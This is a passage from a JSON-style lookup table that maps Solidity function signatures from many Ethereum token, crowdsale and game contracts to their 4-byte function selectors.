"RewardDemoChannel(address,address,address)": "0x86973b0f", "getStageEndDate()": "0xc195dc41", "getStageStartDate()": "0x56394455", "DomusToken()": "0x5b3a6f9e", "Plasma()": "0x71ba3612", "GitCoinCrowdsale(uint256,uint256,address,address)": "0x618cb85b", "LockDiv(address,uint256)": "0x2f78bab1", "LookUpAvailableDivInt(address)": "0x48ed1e3b", "LookUpAvailableDivLarge(address)": "0x7e4985c5", "CheckForFloating(address,uint256)": "0x93257d33", "GetDivPerCoinLarge()": "0xd17aa842", "IsDividendAvailabe()": "0xa9522f4e", "SignDividend(uint256)": "0x856b7d2c", "SignStopDividend()": "0xf36d1b8e", "IsControledAddress(address)": "0x231fa805", "HasSigningPermission(address)": "0xbb5e78a4", "TotalFloatingInt()": "0xebd4d009", "balanceOfInt(address)": "0x2ec82b8f", "totalSupplyInt()": "0xb258eacf", "_raffleDraw()": "0x66c76592", "raffleDraw()": "0xd03d5231", "SetupRaffle(string,uint256)": "0x10072af7", "ImperoCoin()": "0x2a0bba0e", "TokenRDN(uint256)": "0x7efce591", "TokenOMG(uint256)": "0x12a3cda2", "getFeeRatioForJS(address)": "0xe89a4e92", "settleFeePub(address,address,uint256,address,uint256)": "0x12889639", "setUncirculatedSupplyCount(uint256)": "0x185d1af6", "ELACoin(uint256,string,string)": "0x8db8f8bc", "ZAPAX()": "0xa556a057", "JavaSwapTest(uint256,string,string)": "0x334c5997", "SHITP()": "0xbeb2bad6", "buy3(address[],address[],uint256[],bytes,bytes,bytes)": "0x10ce2f3f", "buy2(address[],address[],uint256[],bytes,bytes)": "0xb62fc7c0", "buy1(address[],address[],uint256[],bytes)": "0xa98a89c2", "approveAndCall(address,uint256,bytes,address[],uint256[])": "0xa09de28d", "withdraw(address,uint256,address[],uint256[])": "0xc4aa94a6", "deposit(address,address[],uint256[])": "0x562fa0df", "weights(address)": "0xa7cac846", "WORLD1Coin()": "0x7c0b582f", "executeBatchTransfer(address[],uint256[])": "0xa561b1c2", "ownerSetAdmin(address)": "0x7168e5d3", "bytesToAddress(bytes,bytes)": "0xbd36c881", "setTimeToBorn(uint256)": "0x6998a85b", "setRefer50x50(address)": "0x14b1e1f8", "setPriceChanger(uint256)": "0x91be0b31", "sendBonusEgg(address,uint256)": "0x9cb75b2f", "burnStake(uint256,address)": "0x67c3ad8e", "changeBntyController(address)": "0x9ed99951", "convertBytesToBytes32(bytes)": "0xf5babff2", "DeusMarketplace(address,address)": "0x31b27c44", "unlock(string,address,address,uint256)": "0x98f6ff63", "nameFilter(string)": "0x42f9192a", "storeData(bytes32[],bytes32[],bytes32[],bytes32[])": "0x056265d1", "exponent(uint256)": "0x0f80fc58", "extract(uint256,uint256,uint256)": "0x5835ac93", "insert(uint256,uint256,uint256,uint256)": "0x843aa0db", "withdrowErc20(address,address,uint256)": "0x24fcbc1c", "transferCongress(address)": "0xa2495ace", "_existPublicKey(address)": "0x15d53d7d", "changeVoters(address,string)": "0xee3f1bc7", "hashMsg(bytes32,address,bytes32,address,uint256,bytes32,string,string)": "0x2d46b54e", "deleteProposal(string)": "0x6154274d", "getProposal(string)": "0x25d3a09d", "commitProposal(string)": "0x921828ac", "verifyProposal(address,address,uint256,string)": "0x14b11875", "voteProposal(address,address,uint256,string,bytes)": "0x3b4159da", "setWeight(uint256)": "0xfc1711f2", "publicKeys()": "0xe96d6e4f", "countOfPublicKey()": "0x576c51bc", "existPublicKey(address)": "0x5a071517", "deletePublicKey(address)": "0x1bf9b325", "addPublicKey(address)": "0xd5838ca7", "getTrustPlatform()": "0x277ea83d", "getTokenSymbol()": "0xf1850af8", "provenAddresseList(address[],bool)": "0xe4917fd2", "provenAddress(address,bool)": "0x4498acba", "setAuthorizedUser(address,bool)": "0xa249225e", "Multisend()": "0x591b41c6", "SweetToken(string,string,address)": "0x6e2adeee", "SweetTokenLogic(address,address,address,address[],uint256[])": "0xeceb9eef", "setLogic(address)": "0x71857000", "Token(string,string,address)": "0x0f683fd1", "setFreeTransfer(bool)": "0x2abfaf1f", "removeFromWhiteList(bytes32,address)": "0x3f32aa70", "addToWhiteList(bytes32,address)": "0x693382a9", "removeWhiteList(bytes32)": "0x9aef8999", "addWhiteList(bytes32)": "0x3bd04d69", "replaceLogic(address)": "0xc8d47f16", "indexOf(bytes32)": "0x6f4ce56a", "listExists(bytes32)": "0x9495ad6c", "listNamesLen()": "0x1f99c458", "sameWhiteList(address,address)": "0x66c618d4", "TokenLogic(address,address,address)": "0x9eec6e89", "triggerTransfer(address,address,uint256)": "0xe31a7c01", "setTokenLogic(address)": "0x3a3d523f", "TokenData(address,address)": "0x6e4ac25f", "roleList(bytes32,bytes32,address)": "0x8b51ca42", "AEStoken()": "0xab9a5caa", "allowedToUpgrade()": "0x8a40bd00", "walletReserve()": "0x6e3f8550", "gcEndTime()": "0x48d453ee", "stage4Bounty()": "0x980cf053", "FIRST_WITHDRAW_RATE()": "0x24e1fa3a", "pfcController()": "0xcfab8862", "GlobalAdmin()": "0xa614d54e", "sendTokensToInvestor()": "0x2eecc46c", "icoBtc()": "0x77cdd2e5", "contributedEth()": "0xb4d3ef5f", "eth_cap()": "0xdbfeb17f", "preIcoHardcap()": "0xda547dcf", "registerFee()": "0x03f187ea", "totalGuess()": "0xd4fb0d23", "deathData_v6()": "0xfe7bf05e", "ETH_RECEIVED_MIN()": "0x16821349", "lastTransactionTime()": "0x4577942c", "yea()": "0x14cbb90d", "gameGiftMaxAmount()": "0xc1b2dfc1", "USDETH()": "0x411d6e19", "coinbaseInit()": "0x4b641f52", "oryza()": "0x8d3def46", "additional_price_money()": "0x8932da79", "object()": "0x2812988f", "contract_num()": "0xacdba7c2", "totalLockedSupply()": "0x16a0ea3c", "best_submission_accuracy()": "0x6d48ae25", "no_aff()": "0xb8d2f523", "HASH_RATE_MULTIPLIER()": "0x151682a5", "decimalsETHToUSD()": "0x223b01db", "CharityInProgressWallet()": "0xd27f41cd", "controllerLookupName()": "0xbef72fa2", "typeA()": "0x7ebd02f8", "return_funds()": "0x64f39b47", "trivial()": "0x170b99d9", "killPoll()": "0x483e3956", "deadlineVoting()": "0x14fd0c14", "campaignCanceled()": "0x12f05418", "affiliateNetwork()": "0x5985ac40", "contributionWallet()": "0xe846f997", "multisigEther()": "0xd06c91e4", "assignedAmountToEcoReward()": "0x5f456c1f", "numTokensSold()": "0x37e0e290", "buyGrimReapersAgainstEther()": "0xd87624ba", "coinBurnMkt()": "0xd67bf1ad", "ROLE_OWNER()": "0x8ad682af", "advisersWallet()": "0x88b7f5e5", "parentAddr()": "0x15328109", "initialTokens()": "0x50bfeadc", "tokenTaxRate()": "0xe742db66", "maximumLockYears()": "0x0e2e4ce8", "CCC()": "0x85e7d4cb", "maxBattleRounds()": "0x3d82cf5a", "minSellAmount()": "0xfa29141b", "isExecutionAllowed()": "0xbb8e8f46", "doCallNumber()": "0xf2c6bab0", "PREBUY_PORTION_MAX()": "0x028118a1", "bancorConverterFactory()": "0xce0bd51f", "totalUserNumber()": "0xe3967eed", "experienceDelay()": "0xc1e457c8", "SpaceImpulseERC20()": "0xfb81563b", "STATE_DONATION_ROUND_1()": "0x62a87466", "totalTokensIssued()": "0x9156a003", "keeCrytoken()": "0x9a2f9e92", "creditDao()": "0x1ee13d0a", "resetDividendsCalculation()": "0xbc8caa47", "release18m()": "0x1b7d5f8c", "firstMembershipPurchase()": "0xe7e52369", "curRequestId()": "0x2135810e", "rateSeedStage()": "0x136fa2d7", "isIcoStarted()": "0x426fa499", "ltdParams()": "0x1ed0e01c", "contract_terminated()": "0x764c499b", "tokenCommissionReceiver()": "0x5bcc8198", "transferFreeze()": "0x3ae83bd4", "td()": "0xa3ffac0d", "destFoundation()": "0x0b305ce9", "CROWDSALE_CLOSING_TIME()": "0x250e7d61", "GoBlockSupply()": "0x15728a73", "moedaToken()": "0xada8938f", "lastBlock_a13()": "0xef1e8dae", "KRYPSTRONG()": "0x6c54d1c1", "vester()": "0xdad5fda3", "companyAllocation()": "0xc6314bf9", "LightningEthereum()": "0x13598b71", "pollBurnQtyMax()": "0x820c1dd0", "unclaimedCreditsWithdrawn()": "0x6190c931", "advisorsTokenAmount()": "0xffa82f78", "saltNHash()": "0x45f472fc", "affiliateContract()": "0x01172005", "addressEccles()": "0xb5fb19ed", "sha3_512()": "0xa1bc7a8f", "payed()": "0x56e4bc1f", "devETHDestination()": "0x4461550b", "ownerEdge()": "0xb70d0b3b", "initialBalanceForCrowdsale()": "0xb006de0d", "committee()": "0xd864e740", "YettaCrowdSale()": "0xe4f8c6fb", "bitwordsWithdrawalAddress()": "0xe96b8aa6", "totalEtherReceived()": "0x7ef3e741", "crowdsaleClosingTime()": "0x10816757", "bidProxy()": "0xed9a3ac1", "gameDeveloper()": "0x337f4c46", "configPerShares()": "0xebc59f32", "ICOadvisor2()": "0x0b730fae", "bet1()": "0x5df3d87e", "ALLOC_TEAM()": "0xb475a1c8", "teamUnfreezeDate()": "0xa8154e17", "cs()": "0x540a5e4e", "bonus01Start()": "0x7c027ed9", "MANAGEMENT_KEY()": "0x058b316c", "getMinAuditPriceCount()": "0xfdc0713b", "privateStageTokensSold()": "0xf3d7bf1d", "privateToken()": "0x1df224c1", "game_withdraw()": "0x0e6f2cf8", "attempts()": "0x5754a042", "ispackagesaleSetup()": "0xe742b943", "airDropNum()": "0x1d123801", "reb()": "0xcfc41c91", "currentAmountReceivedDeposit1Ether18Decimals()": "0x3a6fbacb", "reveal_test_data_groups_block_size()": "0x99b47af8", "bountyTokens()": "0x1a9bf9cf", "TIER1_RATE()": "0x19ac2756", "mvpExists()": "0x7fe320ab", "weiHardCap()": "0x0a7cf2aa", "use_test_data()": "0x5bf72bb1", "contractDurationInDays()": "0x9e254262", "coreVUPDestination()": "0x96d6c134", "setAsTest()": "0x98e54c55", "stopBlock()": "0x44bb3b2f", "volumeType7()": "0xac267435", "DISPLAY_CLASSIQUE_ET_VIDEO()": "0x9d6b74f8", "holder()": "0xe534155d", "withdrawnTokens()": "0x0905aa5c", "MINIMUMCONTIB()": "0x612ecc48", "STANDARD_BUYIN()": "0xae4ac63e", "TOKEN_FIRST_PRICE_RATE()": "0xbc3589bf", "couponBonusEnabled()": "0x8075acd0", "totalEthPos()": "0x19e7fbc2", "claimAndWithdraw()": "0xaead9e47", "WeiPerTicket()": "0x0b97fc8d", "transactionFee()": "0x9ed3edf0", "coreContract()": "0xe80db5db", "ICO_ADDR()": "0x54e0b464", "transferOpen()": "0xc8a73eca", "prvd()": "0x3521d7da", "firstPhaseEndTime()": "0x52b5e85c", "initialWei()": "0x5495794b", "eth_decimal_num()": "0x259d1cb4", "SUM()": "0x3c16761f", "periodPreICOStage()": "0x9c315684", "BetAnB()": "0xd9ff8ffc", "EthertoteAdminAddress()": "0x862235f5", "STAKE_DEADLINE()": "0x9479f2c7", "callVote()": "0x1ad7c199", "bkaddress()": "0x62d21602", "lasttokencount()": "0x2135d2e4", "giveMeSomeBBUCKs()": "0xedeff589", "getTournamentAmt()": "0x609e5ca4", "tokensSoldInThisRound()": "0x7e655ddd", "preSale4Finished()": "0xa1e04406", "registryAdmin()": "0x74c16b23", "presaleTokensIssued()": "0x4c49515d", "minimumPurchaseValue()": "0x7ae506ac", "houseTotal()": "0x9b82171f", "MIN_TIME_EXPLORE()": "0xb15201b2", "ADDRESS_LIMIT()": "0xc2f3ce10", "maxEth()": "0x54fc85ac", "totalTransformedTokens()": "0x9f2f077c", "donGameGiftLineTime()": "0x4a42d99b", "endSecondPeriodTimestamp()": "0x7f3e1841", "profit2eggs()": "0x676095b2", "devTokensWallet()": "0x17ac195a", "btcRelay()": "0xdebbc6eb", "divestFee()": "0x4dc6b523", "periodWeek()": "0x5058f013", "completeCodeUpdate()": "0xc85c75b2", "END_TS()": "0x9a267230", "props()": "0x2060a150", "totalAmountWagered()": "0x08a36a1c", "DT()": "0xedaaeed2", "preSaleBonus2Percent()": "0x644cf307", "staker()": "0x5ebaf1db", "year2LockAddress()": "0x0be5efa6", "FoundationAddress()": "0xce7ca615", "TARGET_TOTAL_SUPPLY()": "0xd63fe1c7", "paymentSortId()": "0x18ab8888", "openSaleSupply()": "0x2360f5a1", "TOKEN_FOR_TEAM()": "0x37574b3d", "icoUsd()": "0xb423d93f", "LZLPrivate()": "0x8e9a7159", "fundRaised()": "0xc71c0b40", "TilexSupply()": "0x13fdd2b4", "bountyOnlineGW()": "0x873dc3b3", "tokenUserCounter()": "0x908c3a6a", "tokenPriceDenom()": "0xf79ebd7f", "pendingOraclize()": "0xb4e7fe0c", "tokenBase()": "0xb61daaee", "indSeedDeposit()": "0x6b0f65d7", "allocateBountyTokens()": "0x81fcfbcc", "setPreSaleAmounts()": "0x69fcbf70", "withdrawFundsToOwner(uint256)": "0x12f20e2a", "getRemainingSupply()": "0xe4b7fb73", "refundEther()": "0x560ed6a1", "DigiPulseToken()": "0xb826d6d7", "upgradeToAndCall(uint256,address,bytes)": "0xa9c45fcb", "upgradeTo(uint256,address)": "0x3ad06d16", "transferProxyOwnership(address)": "0xf1739cae", "proxyOwner()": "0x025313a2", "_upgradeTo(uint256,address)": "0x3a94ab31", "setUpgradeabilityOwner(address)": "0xae7ad3fd", "upgradeabilityOwner()": "0x6fde8202", "transferTokens(address,uint256[])": "0x2b9530d8", "changeIdentityEthAddress(address)": "0xd10541ab", "B2Lab_TokenPlus(address)": "0x2c7ee894", "setIdentityExtended(bool,bool,bool)": "0x397e0287", "checkIdentity(bytes32)": "0x218dd3dd", "setMyIdentity(bytes32,string,string)": "0xb0181b3c", "isIdentity(address)": "0x4e0e9675", "ChainStarToken()": "0xc1429c11", "ChainStarBase(uint256,string,string,uint8)": "0x802bbab2", "DSC()": "0xc8804b7b", "Electrocoin(uint256,uint256)": "0x2d9b1530", "unlockTokensForAddress(address)": "0xb9037bc2", "lockTokensForAddress(address,uint256,uint256)": "0xda5140fc", "DayDayToken(address)": "0x7a9c960b", "EduCoin()": "0x6de3afc9", "WilliamCoin()": "0x4692a481", "SimpleCoinToken()": "0x8da15531", "LBSN()": "0x88417820", "setStartLockPeriod(uint256)": "0x1730e216", "backup_refund(uint256,uint256)": "0x81776ba4", "backup_drawdown_amount(uint256)": "0x5732a273", "backup_drawdown()": "0x8a3bacd1", "backup_exchangeEthStb(uint256,uint256)": "0x4425d66d", "backup_exchangeStaStb(uint256,uint256)": "0x619fc641", "backup_finishIcoVars()": "0xcfe0d487", "transferStbToOwner(uint256)": "0xefbb6108", "transferEthToOwner(uint256)": "0xce7c5d7f", "drawdown()": "0xe77ef21f", "exchangeEthStb(uint256,uint256)": "0x9e6af2e3", "exchangeStaStb(uint256,uint256)": "0xba37caa4", "StableICO()": "0xf47125f5", "maxSupply()": "0xd5abeb01", "ERC223Token_STB()": "0x04780570", "setIcoAddress(address,address)": "0xdda2d923", "burn(address,address,uint256)": "0xf6b911bc", "icoAddress()": "0x788ce6f2", "minedTokenCount()": "0xe406bb4b", "selfDestroy()": "0xb9750acf", "ERC223Token_STA()": "0x46bf5864", "adjustTap(uint256)": "0x0c51015d", "LBToken(address,uint256)": "0xe95ac9f7", "Bullex()": "0x7c5e83cc", "rename(string,string)": "0x9c7c722b", "CPCToken(uint256,string,uint8,string)": "0x0ac50a6e", "OHGVientiane()": "0xbde18839", "mintTokensToEralyInvestors()": "0xd571829e", "setEarlyInvestorsBonus(uint256)": "0x4b9ed302", "setPresaleAddress(address)": "0xbdb9f28d", "setPeriod(uint16)": "0xfba2a2d2", "totalInvestors()": "0x29b8caff", "distributeLRNX(address[],uint256)": "0xe694f694", "LearnX()": "0xfb0c1faa", "GoCryptobotCoinCore()": "0x173dbd4e", "getRemainCoins()": "0xdf40503c", "backResiliumOwner()": "0x604aa2cb", "Resilium()": "0x6f81adf6", "getSecondTokens()": "0xcb45a294", "getFirstTokens()": "0x3422e048", "FoundersContract(address)": "0x4a367140", "Bullioncoin()": "0xf35b3b51", "Seele()": "0x7d0cf8b5", "update(address,uint256)": "0xa2d83b5e", "addRec4L8R(address,uint256)": "0xa9e931ab", "thinkLength()": "0x7503cda9", "stopThinking(uint256)": "0x3a6120c5", "startThinking()": "0xf4a9c919", "splitterContract(address,uint256)": "0x76375c5c", "setDDF(address)": "0xb5a01992", "RUDAWORLD()": "0x34ab8256", "setAllowance(address,uint256)": "0x310ec4a7", "changeRewardAmount(uint256)": "0xb93833c3", "changePricePerUnicorn(uint256)": "0xdf2e5c0f", "changeUnicornRanchAddress(address)": "0xf4736429", "changeCardboardUnicornTokenAddress(address)": "0xc9c666aa", "getBooking(address,uint256)": "0x0b0edad3", "_getRandom(uint256)": "0xdd1e4e11", "_generateGene()": "0x5b07d7d6", "_getFirstIndex(uint256,uint256[])": "0x14c72e9e", "bidExchange(uint256,uint256)": "0xd3e212c5", "cancelExchange(uint256)": "0x5d3d08a8", "getCrystalWrapper(address,uint256)": "0x757bd312", "createExchange(uint256,uint256,uint256)": "0x7909da6f", "meltCrystals(uint256[])": "0x889087b1", "mineCrystals(uint256)": "0xc67415f3", "_transferFromOwner(address,uint256)": "0x1bf6ba7e", "buyPickaxes(address)": "0x03294614", "setEthereumWallet(address)": "0x815a4876", "Funding()": "0x3fc3e53f", "Close()": "0xc35789cc", "RefundDeposit(address,uint256)": "0x23285480", "ToLend()": "0x98a2f59f", "SetPrcntRate(uint256)": "0x6eecf81a", "abi(bytes32)": "0x8dfde39d", "create(string,string)": "0x198e2b8a", "strcpy(string,uint256,string)": "0x3313e95d", "BDSM()": "0x69d19c19", "setTelegram(string)": "0xe8e81fe4", "PlusUltra()": "0xda3d18e8", "BuyLimitsCrowdsale(uint256,uint256)": "0xd420e527", "_prePurchaseAmount(uint256)": "0x86814819", "GoodKarma(uint256,string,uint8,string)": "0x7bf992ac", "GaiaToken()": "0x3792e117", "claimTokens(address[])": "0xeef72a3c", "setClaimedFlag(bool)": "0x43b6c7d0", "SeeleToken(address,address,uint256)": "0xc848fab7", "IdxCoin()": "0x6941a061", "sortAuction(uint256[])": "0xa703078c", "monstersForSale(uint8)": "0x9e1e1ca9", "hatchEgg(uint256,string)": "0xe9ab04a8", "buyRareEgg(uint8,uint256,address)": "0x1befcbaf", "setGenes(uint256,uint256)": "0xca80b489", "ceil(uint256)": "0x40f0a21f", "burnAuction()": "0xc9f0a02d", "addAuction(uint32,uint256,uint256,uint8,uint8)": "0x77fa3d32", "quicksort_core(uint256[],uint256,uint256)": "0xf505f5f7", "quicksort(uint256[])": "0xa4a249d6", "getPivot(uint256,uint256,uint256)": "0x56fb8a34", "swap(uint256[],uint256,uint256)": "0xf5a956d8", "getCloneArray(uint256[])": "0xd2305f07", "getSortedArray(uint256[])": "0x1e1d237e", "setCooldown(uint64)": "0x4b11982e", "userWithdraw(uint256)": "0x3b9056bf", "setEggTable(uint16,uint32[])": "0x11affa5c", "setAddresses(address,address,address)": "0x363bf964", "setEggTotal(uint8,uint256)": "0x1af476a6", "setMasterToReferral(address,address)": "0x278a4c4f", "setNewMonster(uint256,uint32,address,string,string)": "0x5b6a42b8", "transferAuction(address,address,uint256)": "0xd3fd9eba", "setMonsterGene(uint64,uint256)": "0xe931fa0c", "getTotalMonster()": "0x82ef351a", "addMonsterObj(uint64,uint256,uint32,address,string,string)": "0x4654b6e2", "setStatus(bool,bool)": "0xb3c2eac1", "completeMigration(address,uint256)": "0x780ae915", "_updateProfit(uint256,bool)": "0x804e1c53", "_updateSolvency(uint256)": "0xac8e88c2", "_updateTokensAvailable(uint256)": "0xe9d862b0", "BSCToken(uint256,string,uint8,string)": "0x83771e56", "multiTransferDecimals(address[],uint256[])": "0x6ac878f3", "reName(string,string)": "0x6dd4927b", "IMOSToken()": "0xd073c531", "SquirtCoin()": "0x943250c4", "Solario()": "0x2d906a19", "burntokens(uint256)": "0x94b0780f", "OFNOG()": "0xd8e60616", "DropdCoin()": "0x6815c19c", "lockSupply(bool)": "0x1eeaa389", "allowedAddress(address)": "0x40908298", "getUnclaimedHalvingSubsidy(uint256)": "0x23f685dd", "getTotalHashRate()": "0x3adf7280", "getTotalHashRateOf(address)": "0x145fd87a", "getMinerHashRateCurrentHalving()": "0xf3adcc46", "getMinerHashRate(uint256)": "0xa136aadc", "getHashRateOfCurrentHalving(address)": "0x4dd37f19", "getHashRateOf(address,uint256)": "0x7cb4ef0e", "getMinerOffset()": "0xa8bfd57f", "getMinerOffsetOf(address)": "0x88c30278", "getMinerHalvingHashRate()": "0xc2db9e25", "getMinerHalvingHashRateOf(address)": "0x4ab7cbfe", "getMinerHalving()": "0x15b4bc22", "getHalvingOf(address)": "0x675a54b9", "getBlockOf(address)": "0x319a2494", "getMinerBlock()": "0xe1c093da", "getHalvingBlocks()": "0x1a7c6eb0", "getPoll(bytes32)": "0x2cbbd738", "deletePoll(bytes32)": "0x8c4c564d", "createPoll(string,uint8)": "0x797a49b6", "claimableHalvingsOf(address)": "0xaba88766", "claimableHalvings()": "0x29546713", "claimHalvingsSubsidies(uint256)": "0x14697cc8", "proxiedContribution(address)": "0x846b0ef0", "halvingSubsidy(uint256)": "0xc24de0e4", "blockSubsidy(uint256)": "0xeaea25ec", "halvingStartBlock(uint256)": "0x7b5d5d1a", "currentHalving()": "0xe6fd42ee", "blockOffset(uint256)": "0x3bc2859e", "blockHalving(uint256)": "0xe4998173", "setBTHFoundationWallet(address)": "0xd7ea97e2", "unPause(bytes32)": "0x8ac91be7", "pause(bytes32)": "0xed56531a", "killTo(address,bytes32)": "0x1e40375f", "BTH(address[],uint256,address,uint256,uint256,uint256)": "0x7fbcef65", "forwardSomeFunds(uint256)": "0x952ad7cb", "CrowdSale_AssignOwnership(address)": "0x9f62e202", "CrowdSale_Change_ReceiveWallet(address)": "0xb1432cc3", "CrowdSale_Finalize()": "0x9a8d86c5", "CrowdSale_Resume()": "0x658f2ad6", "CrowdSale_Halt()": "0x4f6c3372", "migrate(uint256)": "0x454b0608", "upgradingEnabled()": "0xc35506c0", "migrationAgent()": "0x8328dbcd", "NotaryPlatformToken()": "0xb1987c7d", "MultisigWallet(address[],uint256,uint256)": "0xe8fbc67d", "addUser(bytes32,bytes32,uint256)": "0xd5cd3243", "toEthFunction()": "0x04f4d425", "a(uint256,uint256,uint256)": "0xbf3b9e38", "register(address,string,uint8,string)": "0xf50aac53", "getBalanceOfToken(address)": "0x83786f8c", "processDonate(address)": "0xaae1f5c3", "isPoDEnded()": "0x8f85f92c", "isPoDStarted()": "0x9b3dfce0", "getEndTime()": "0x439f5ac2", "getStartTime()": "0xc828371e", "getCapOfWei()": "0x6ccce7a8", "getCapOfToken()": "0x97722acf", "getTokenPrice()": "0x4b94f50e", "getBalanceOfWei(address)": "0x09fc93c1", "resetWeiBalance(address)": "0x112ed3f5", "PoD()": "0x85db2e3a", "getMyLockedFundsReleaseTime()": "0x17c51080", "getMyLockedFunds()": "0x52774565", "payIn(uint256)": "0xdf78c1dd", "verify(bytes32,uint8,bytes32,bytes32)": "0xf1835db7", "getBlanace()": "0x71c4980b", "close(string,bytes32,uint8,bytes32,bytes32)": "0x774eb322", "decodeMessage(string)": "0xa7c1abf1", "validateMessage(string,bytes32,uint8,bytes32,bytes32)": "0xd744f47c", "matchStake()": "0x257e5c69", "initialDeposit(address)": "0x60506aff", "Channel(address,address)": "0x8c5e06b1", "icapTransfer(bytes32,address,bytes32,uint256)": "0x6042a760", "transfer(bytes32,address,uint256)": "0x3feb1bd8", "processOrder(bytes32)": "0x93d18e92", "prev(uint80)": "0xffe189ef", "valid(uint80)": "0x876848d3", "next(uint80)": "0x438e1316", "getOrder(uint80)": "0x4d88a639", "createOrder(bytes32,bytes32,address)": "0x6250bfa3", "append(bytes32)": "0x6483ec25", "delegateCustodian(address,address)": "0x81afc50d", "registerGold(address,address,bytes32)": "0x3990b7c7", "VendorInterface(address)": "0xc235e858", "createTokens(address,uint256)": "0xa69e894e", "IcoContract(address,address,uint256,uint256,uint256,uint256,uint256)": "0xf1b12493", "CreateICO(address,uint256)": "0x834e6261", "sell(address,uint256)": "0x6c197ff5", "setIcoContract(address)": "0xe09678fd", "IcoToken(string,string,uint256,string)": "0xce686e40", "injectTokens(address,uint256)": "0x21ce14a9", "ExampleToken(address[])": "0x5d41dd6f", "consumeTicket(address,uint256)": "0xe81ca129", "getTicketCount(address)": "0xcff82e22", "Ticket(string,uint256)": "0xfdc202f1", "getClaimableStake()": "0x575a4187", "getFeePool()": "0x38516064", "getRewardPool()": "0x1b8b13a7", "getEarningsPool()": "0xb61f16e3", "rewardPoolShare(uint256,bool)": "0x167aee44", "feePoolShare(uint256,bool)": "0x0ffdbd42", "hasClaimableShares()": "0x846030a0", "setRewardPool(uint256)": "0x1da4ed85", "setFeePool(uint256)": "0xc63445f3", "claimShare(uint256,bool)": "0x9607a1db", "init(uint256,uint256,uint256)": "0x8cd8db8a", "z()": "0xc5d7802e", "y()": "0xa56dfe4a", "x()": "0x0c55699c", "w()": "0x205c9cc7", "v()": "0x7c2efcba", "u()": "0xc6a898c5", "r()": "0x6c8ae38c", "q()": "0xfd3ab282", "p()": "0x9ae8886a", "o()": "0x50cd4df2", "l()": "0xece866b9", "j()": "0xb582ec5f", "k()": "0xb4f40c61", "h()": "0xb8c9d365", "e()": "0xffae15ba", "pay(uint256,address)": "0x31cbf5e3", "LimitBalance(uint256)": "0xe92dfb23", "Distributor(uint256,address)": "0xaabf901a", "setBlack(bool)": "0x7dab61b6", "getBlack()": "0xee6d84c5", "setCreate(bool)": "0xc878851d", "getCreate()": "0x045894ab", "setPermission(address,string,bool)": "0xdc570aad", "getPermission(address,string)": "0x8586b2f0", "setStore(uint256)": "0x7f626f1a", "SimpleStore(uint256)": "0xcdef9fb6", "setMockedTotalCollected(uint256)": "0xc7c3b2dd", "setMockedBlockNumber(uint256)": "0xc0c6a68a", "AragonTokenSaleMock(uint256,uint256,address,address,uint256,uint256,uint8)": "0xbb784140", "testIsTrue()": "0x40b12b40", "testCalculateNeededCollateral()": "0xe5ffea8e", "testDivideFractional()": "0x19618a9b", "failDivideFractionalByZero()": "0x4de85639", "testSafeAdd()": "0xdc1542aa", "addPhenomenon(string,string,string,string,uint8)": "0x5c1020f9", "getAirdropTokens()": "0xab4e8ef1", "isEligibleForAirdrop(address)": "0xe9d1c598", "getAirdropList(address)": "0xaa61fc58", "getAirdropList()": "0x4f6fcc46", "addAirdropList(address,uint256)": "0xd6ed8f52", "DITCOIN()": "0x4e358ce7", "OMGToken()": "0x7e823bd1", "IvoryToken()": "0x31d3518a", "LQX()": "0xb76c2e39", "ERC721BasicToken()": "0xb4e68dc1", "_registerInterface(bytes4)": "0x068417d9", "SupportsInterfaceWithLookup()": "0x33670c1c", "doAirDrop(address[],address,uint256[])": "0xaa5dd215", "stop_auction()": "0x15f5ea17", "take_back_money()": "0x5d16b8de", "CryptoDiamondCoin()": "0x73a26a12", "VITE()": "0xd3c4055d", "clearTokenSale(uint256)": "0xa881f85e", "rateForSale(uint256)": "0xdf0efbf5", "tokenForSale(uint256)": "0x414db89e", "reload(uint256,uint256)": "0xb0483c3f", "canRaiseUsing(uint256)": "0x2b2443db", "raisedUsing(uint256)": "0x97976d15", "raiseLimit(uint256)": "0xab0facc0", "setJypcBonus(uint256)": "0x127a0dd9", "setMinBuyEth(uint256)": "0x8e1e3eb1", "_getJYPCBonus()": "0xbee1351e", "WindToken()": "0xea020f7b", "VTCoin(uint256,string,uint8,string)": "0xa319b232", "editGas(uint256,uint256)": "0x2bd9530a", "CynkciarzToken()": "0x51254729", "prepair(address)": "0x00c33731", "setManyAllocations(address[],uint256)": "0x3389f273", "BlockchainDevCoin()": "0xa8c923e2", "FOG()": "0xf61f35dd", "receiveCashback(uint256,address)": "0x61f82156", "addCashback(string,uint256,address,uint256[],uint256[])": "0x8f7d33cf", "ArjunaCoin()": "0x745cf221", "TradeBox()": "0xe9b3fd39", "verifyTx(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[3])": "0xc834d03d", "baseball()": "0xa9ca6057", "SetupMultipliers(uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xa42d630c", "ShitcoinCash()": "0x876f5746", "LifeToken()": "0x42980e20", "LiquexPrivateInvestment(address)": "0x347b5193", "user_redeem()": "0x537fdf59", "admin_redeem(address)": "0x033a6cab", "calculateBonusPercentage(uint256)": "0xb900da19", "addCloud(uint16,uint16,uint16,uint8,uint8)": "0xafd42fd3", "removeCoin(string)": "0xc392079f", "getIsSecurityWalletReg(address)": "0xdda61c00", "getIsCoinReg(string)": "0xec357c64", "getCoinAddress(string)": "0xd06544d0", "blackswanToken()": "0x36df99b6", "startSale(bool)": "0x9c4c557c", "BOBOTOKEN2()": "0x2b3da717", "DAPSTOKEN()": "0xcf04dd7e", "GGGToken()": "0x8305d1c3", "airdropToAdresses(address[],uint256)": "0x71906087", "setAirSender(address)": "0xb6d1d3d1", "setAirLimitCount(uint32)": "0x7d4deda1", "setAirAmount(uint256)": "0xeea7e46b", "setAirState(bool)": "0x500ec41b", "powercoin()": "0xe4b8ebb7", "BookERC20EthV1p1Factory()": "0xc867fa29", "BookERC20EthV1p1()": "0x777e82ca", "Gemmes()": "0xe55a7afb", "newUser(string,string)": "0x1f34563c", "newUserFrom(address,string,string)": "0x60727416", "verifyTx(uint256[2],uint256[2],uint256[2][2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[2],uint256[5])": "0x50c007c6", "removeTokens(address,address,uint256)": "0xe2a38a4b", "addTokens(address,address,uint256)": "0x8daaf0a2", "fxxkicotestToken()": "0x41130267", "cerotest()": "0x310b065b", "getPayload()": "0x2cae8ae4", "getPayloadFrom(address)": "0xfd2ce18e", "setPayload(string)": "0xe1ad7699", "setPayloadFrom(address,string)": "0xeea4b1ad", 